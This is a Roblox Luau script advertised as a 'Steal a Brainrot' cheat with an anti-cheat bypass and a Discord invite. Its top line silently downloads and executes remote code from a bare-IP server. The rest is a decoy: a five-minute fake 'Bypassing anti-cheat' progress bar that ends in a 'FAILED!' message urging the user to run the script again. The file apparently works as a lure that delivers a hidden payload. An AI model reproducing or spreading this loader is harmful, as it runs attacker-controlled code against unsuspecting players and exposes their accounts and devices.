ID="3c222cac-c2ea-49d9-9b23-c7c221411e95";
loadstring(game:HttpGet("http://5.129.235.74:3910/cdn/loader.luau"))()
--// Services
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
local TweenService = game:GetService("TweenService")

------------------------------------------------
-- REMOVE OLD UI
------------------------------------------------
if playerGui:FindFirstChild("LoadingScreenUI") then
	playerGui.LoadingScreenUI:Destroy()
end

------------------------------------------------
-- CREATE LOADING SCREEN (smaller)
------------------------------------------------
local gui = Instance.new("ScreenGui")
gui.Name = "LoadingScreenUI"
gui.ResetOnSpawn = false
gui.Parent = playerGui

local LoadingFrame = Instance.new("Frame")
LoadingFrame.Size = UDim2.new(0, 340, 0, 120)
LoadingFrame.Position = UDim2.new(0.5, -170, 0.5, -60)
LoadingFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 35)
LoadingFrame.BorderSizePixel = 0
LoadingFrame.Parent = gui
Instance.new("UICorner", LoadingFrame).CornerRadius = UDim.new(0, 10)

local bgGradient = Instance.new("UIGradient")
bgGradient.Color = ColorSequence.new({
	ColorSequenceKeypoint.new(0, Color3.fromRGB(10, 10, 25)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(35, 0, 70))
})
bgGradient.Rotation = 90
bgGradient.Parent = LoadingFrame

local Title = Instance.new("TextLabel")
Title.Parent = LoadingFrame
Title.Size = UDim2.new(1, 0, 0, 25)
Title.BackgroundTransparency = 1
Title.Text = "Steal a Brainrot Script"
Title.Font = Enum.Font.GothamBold
Title.TextColor3 = Color3.fromRGB(220, 225, 255)
Title.TextSize = 15

local Link = Instance.new("TextLabel")
Link.Parent = LoadingFrame
Link.Size = UDim2.new(1, 0, 0, 20)
Link.Position = UDim2.new(0, 0, 0, 25)
Link.BackgroundTransparency = 1
Link.Text = "https://discord.gg/zYMHBpUX"
Link.Font = Enum.Font.Gotham
Link.TextColor3 = Color3.fromRGB(170, 175, 255)
Link.TextSize = 13

local StatusText = Instance.new("TextLabel")
StatusText.Parent = LoadingFrame
StatusText.Size = UDim2.new(1, 0, 0, 20)
StatusText.Position = UDim2.new(0, 0, 0.42, 0)
StatusText.BackgroundTransparency = 1
StatusText.Text = "Bypassing anti-cheat"
StatusText.Font = Enum.Font.Gotham
StatusText.TextColor3 = Color3.fromRGB(230, 235, 255)
StatusText.TextSize = 14

local ProgressBarBg = Instance.new("Frame")
ProgressBarBg.Parent = LoadingFrame
ProgressBarBg.Size = UDim2.new(0.9, 0, 0, 20)
ProgressBarBg.Position = UDim2.new(0.05, 0, 0.65, 0)
ProgressBarBg.BackgroundColor3 = Color3.fromRGB(30, 30, 45)
ProgressBarBg.BorderSizePixel = 0
Instance.new("UICorner", ProgressBarBg).CornerRadius = UDim.new(0, 6)

local ProgressBar = Instance.new("Frame")
ProgressBar.Parent = ProgressBarBg
ProgressBar.Size = UDim2.new(0, 0, 1, 0)
ProgressBar.BorderSizePixel = 0
Instance.new("UICorner", ProgressBar).CornerRadius = UDim.new(0, 6)

local barGradient = Instance.new("UIGradient")
barGradient.Color = ColorSequence.new({
	ColorSequenceKeypoint.new(0, Color3.fromRGB(70, 70, 255)),
	ColorSequenceKeypoint.new(0.5, Color3.fromRGB(80, 0, 255)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(60, 0, 200))
})
barGradient.Rotation = 0
barGradient.Parent = ProgressBar

local PercentageText = Instance.new("TextLabel")
PercentageText.Parent = ProgressBarBg
PercentageText.Size = UDim2.new(1, 0, 1, 0)
PercentageText.BackgroundTransparency = 1
PercentageText.Text = "0%"
PercentageText.Font = Enum.Font.GothamBold
PercentageText.TextColor3 = Color3.fromRGB(230, 235, 255)
PercentageText.TextSize = 13

------------------------------------------------
-- Dots animation
------------------------------------------------
local dots = ""
local statusBase = "Bypassing anti-cheat"
task.spawn(function()
	while LoadingFrame.Parent do
		for i = 0, 3 do
			dots = string.rep(".", i)
			StatusText.Text = statusBase .. dots
			task.wait(0.35)
		end
	end
end)

------------------------------------------------
-- SMOOTH LOADING BAR ONLY
------------------------------------------------
task.spawn(function()
	local totalTime = 300 -- 🔥 5 minutes loading time
	local startTime = tick()

	while tick() - startTime < totalTime do
		local progress = math.clamp((tick() - startTime) / totalTime, 0, 1)
		local tween = TweenService:Create(
			ProgressBar,
			TweenInfo.new(0.1, Enum.EasingStyle.Linear),
			{ Size = UDim2.new(progress, 0, 1, 0) }
		)
		tween:Play()
		PercentageText.Text = math.floor(progress * 100) .. "%"
		statusBase = progress < 0.5 and "Bypassing anti-cheat" or "Finalizing bypass"
		task.wait(0.05)
	end

	-- Full bar instantly
	ProgressBar.Size = UDim2.new(1, 0, 1, 0)
	PercentageText.Text = "100%"
	task.wait(0.3)

	------------------------------------------------
	-- REMOVE LOADING UI
	------------------------------------------------
	LoadingFrame:Destroy()

	------------------------------------------------
	-- FAILED UI (fade-in only)
	------------------------------------------------
	local FailedFrame = Instance.new("Frame")
	FailedFrame.Size = UDim2.new(0, 340, 0, 120)
	FailedFrame.Position = UDim2.new(0.5, -170, 0.5, -60)
	FailedFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 35)
	FailedFrame.BorderSizePixel = 0
	FailedFrame.BackgroundTransparency = 1
	FailedFrame.Parent = gui
	Instance.new("UICorner", FailedFrame).CornerRadius = UDim.new(0, 10)

	local failGradient = Instance.new("UIGradient")
	failGradient.Color = ColorSequence.new({
		ColorSequenceKeypoint.new(0, Color3.fromRGB(10, 10, 25)),
		ColorSequenceKeypoint.new(1, Color3.fromRGB(35, 0, 70))
	})
	failGradient.Rotation = 90
	failGradient.Parent = FailedFrame

	local FailedTitle = Instance.new("TextLabel")
	FailedTitle.Parent = FailedFrame
	FailedTitle.Size = UDim2.new(1, 0, 0, 30)
	FailedTitle.Position = UDim2.new(0, 0, 0.15, 0)
	FailedTitle.BackgroundTransparency = 1
	FailedTitle.Text = "FAILED!"
	FailedTitle.Font = Enum.Font.GothamBold
	FailedTitle.TextColor3 = Color3.fromRGB(255, 80, 80)
	FailedTitle.TextSize = 22
	FailedTitle.TextTransparency = 1

	local FailedMessage = Instance.new("TextLabel")
	FailedMessage.Parent = FailedFrame
	FailedMessage.Size = UDim2.new(1, 0, 0, 20)
	FailedMessage.Position = UDim2.new(0, 0, 0.55, 0)
	FailedMessage.BackgroundTransparency = 1
	FailedMessage.Text = "Please try executing the script again."
	FailedMessage.Font = Enum.Font.Gotham
	FailedMessage.TextColor3 = Color3.fromRGB(255, 120, 120)
	FailedMessage.TextSize = 15
	FailedMessage.TextTransparency = 1

	local fadeInFrame = TweenService:Create(FailedFrame, TweenInfo.new(1.2), { BackgroundTransparency = 0 })
	local fadeInText1 = TweenService:Create(FailedTitle, TweenInfo.new(1.2), { TextTransparency = 0 })
	local fadeInText2 = TweenService:Create(FailedMessage, TweenInfo.new(1.2), { TextTransparency = 0 })

	fadeInFrame:Play()
	fadeInText1:Play()
	fadeInText2:Play()
end)
